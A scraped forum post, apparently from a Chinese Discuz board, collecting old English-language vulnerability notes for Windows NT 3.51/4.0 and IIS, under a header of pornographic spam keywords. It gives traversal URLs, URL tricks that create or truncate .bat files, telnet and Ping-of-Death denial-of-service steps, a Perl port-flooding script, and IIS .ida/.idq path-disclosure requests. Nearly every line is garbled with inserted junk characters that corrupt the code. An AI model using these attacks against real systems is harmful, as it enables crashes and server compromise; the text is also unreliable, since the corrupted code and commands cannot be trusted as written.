久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

    1. <sub id="9pxky"></sub>
    2. <small id="9pxky"></small>

           找回密碼
           注冊

          QQ登錄

          只需一步,快速開始

          NT的漏洞及描述(英文)

          [復(fù)制鏈接]
          1#
          發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
          受影響系統(tǒng):4.0,iis 1.0- P% r& T8 C. A: n1 R
          A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
          7 ~; n3 i# s- x/ u) s$ b3 x+ k2 n9 Y4 k9 t
          A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
          * b6 y. o( }- y+ N0 |" r) R
          * z; A" d9 Q* XBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.. h8 ~+ Z: d) ~# e, f0 q

          : h& L# Y# I7 X& Z+ R" l/ z$ Y5 W--------------------------------------------------------------------6 v4 V- |# u6 ]9 V) _  y" x6 y4 @
          7 W) d' T  P) u2 Z1 X# ~
          受影響系統(tǒng):4.0
          4 B" `) @0 Y' EA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.) u: N. |4 v- s  a. K& d# n

          2 ^# N) _6 P; h+ p: R3 u9 IIf the file 'target.bat' exists, the file will be truncated.
          1 k$ q6 F" Q" {4 E$ a( G3 Q) U9 `0 U) b# h2 N4 ~

          0 d- K1 [0 U" LA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
          & y+ U# D; L% M5 V7 ]+ [3 _- Q3 i1 ~5 `7 N% \
          ----------------------------------------------------------------------: Y2 g1 j: e- @
          " o/ I3 `% f; C
          受影響系統(tǒng):3.51,4.0( v; E. K# m* I2 K
          Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.  w  c$ E7 ~/ e- X  z, ^4 ]2 ~, }# @
          . {+ |/ A! m7 y* ]
          The following steps;
          , d$ o  f+ h8 n6 d+ a+ h: ?7 q6 r- O4 C( p3 Q
          Telnet to an NT 4.0 system on port 135 ( T+ W2 m( u7 x6 [
          Type about 10 characters followed by a <CR> 0 E6 s& Z( L' z! L* v8 @# s
          Exit Telnet 6 F. a4 D; }+ _6 j7 J! }
          results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.9 t! C. v7 v4 H: f3 g% i5 d

          4 W* F6 p0 {" m' c: G3 ~, rWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.+ O$ t- q& ?3 T2 B3 v3 Y
          % ^1 k$ {3 N1 _
          The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.% I: U) o, k/ t) K
          ( K6 W8 [& f' i/ l& e
          If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
          + B! i" ^; I3 |5 ]5 F8 C7 b& x. d8 T, `/ C+ |! N' b
          The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):3 y4 B% @( u! j5 ~% c

          $ R( K9 q) b. z" u( r/*begin poke code*/2 b4 g/ p; n. `

          + D* a# f+ Y# A2 G' I, Guse Socket;
          3 h% s4 {, l; R% B! B  N, iuse FileHandle;* S& t1 D+ R, I6 |7 D' o
          require "chat2.pl";0 b- i) d$ d" u5 z& B: a

            H0 v( ]& F+ d/ D$systemname = $ARGV[0] && shift;
          # n" I4 a2 [% q% K- C
          : }7 y* U' x% x% l9 x- W2 N) [: z$verbose = 1; # tell me what you're hitting  {2 i2 U/ ~# x& x
          $knownports = 1; # don't hit known problem ports
          : }! q- E. i7 |, Q+ H9 B2 a& Kfor ($port = $0; $port<65535; $port++)
          - z  `4 R7 P2 ]# k{
          : z+ ?2 |, x- K+ h% c$ u* A! D- Q! U$ z# e" z- v$ v
          : _' u( ~6 `2 U) r, `; }! U* G
          if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {: B& [  @# S! S. s
          next;
          ! ?) r  N0 ?- b7 s1 M}
          ' |2 @+ e/ }$ O% r/ Z; {" M0 A$fh = chat::open_port($systemname, $port);
          3 S3 F1 N; X. z- M- x; R. s  |chat::print ($fh,"This is about ten characters or more");
          0 o/ N9 p9 p+ C; T: n4 G+ G5 V* jif ($verbose) {
          5 j9 j3 \, k/ F/ j( tprint "Trying port: $port\n";
          ' s- ~( h+ p6 T1 B# g1 j2 l3 J4 Z} & C( D1 [6 E: u
          chat::close($fh);
          6 P- _# R# b# N
          6 W& d+ \3 v: e# s% P}
          / _- s* f# R4 b" T( P& o$ Z. D. J9 k2 l( Q2 V/ E4 y
          % J" W5 o+ R7 |% k
          /*end poke code*/
          6 G2 f4 I/ K* H" S7 s4 b  n* v) w, R3 c
          Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername1 E8 h  x! _7 ~; M
          : Y! j7 D& C$ B
          --------------------------------------------------------------------------------# `8 s# j, E; W1 u8 p
          7 N  G* q4 P3 r
          受影響系統(tǒng):4.0
          $ @- H0 }# f2 |0 b% h% K6 Z; iUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
          : D4 M$ p# q; D4 f" R
            p# j8 ~8 f' v" _% i. oThis attack causes Dr. Watson to display an alert window and to log an error:
          - q8 G& B" k, v! p) w/ B+ n. A8 o+ d! |8 S9 I/ Z4 u3 Q
          "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"9 S0 w4 ?3 M  C3 j( v  d: b: J

          ' `$ _1 a' N0 @) f3 ^" s--------------------------------------------------------------------------------" i! m7 I) l' r, T! T! K- M

          $ c+ Z1 E* @5 C  r+ p8 W" F3 K受影響系統(tǒng):3.51,4.0
          7 `/ S, F1 C+ z& z: W7 s# Y9 ILarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
            _& y- g+ f* A- M5 E% d! U) k" q9 I' Z8 E1 ]: y
          STOP: 0X0000001E4 f+ F7 E8 r7 _* e
          KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
          + _9 \. B& V# ~+ z4 A
            j/ ]  A" d+ g$ Z4 ?9 l9 e8 _-OR-  h+ x0 p/ Q) v# B% z. N
          : A3 }% d* F! I4 ~0 L; q6 ]
          STOP: 0x0000000A
          9 N$ ~# n$ K: X1 R, R3 RIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS  W1 D: F( a+ }* m
          4 S! o0 {" V' g/ M0 X+ J) _
          NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.% X' g9 l6 j% w

          ) ~8 d5 N2 A% e$ X) t/ {--------------------------------------------------------------------------------* i' R$ V- c8 N7 C- A

          ) S5 ]7 }, }% h) w' NMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
          + m1 F( I7 |+ w2 Z) g7 P! a
          1 x, v' A( a4 x- n( d--------------------------------------------------------3 n) \6 J, K% P2 i; l6 M2 w
          3 _/ l, G2 q0 W" l( q3 F
          IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
          您需要登錄后才可以回帖 登錄 | 注冊

          本版積分規(guī)則

          QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

          GMT+8, 2025-4-15 08:58

          Powered by Discuz! X3.5

          © 2001-2025 Discuz! Team.

          快速回復(fù) 返回頂部 返回列表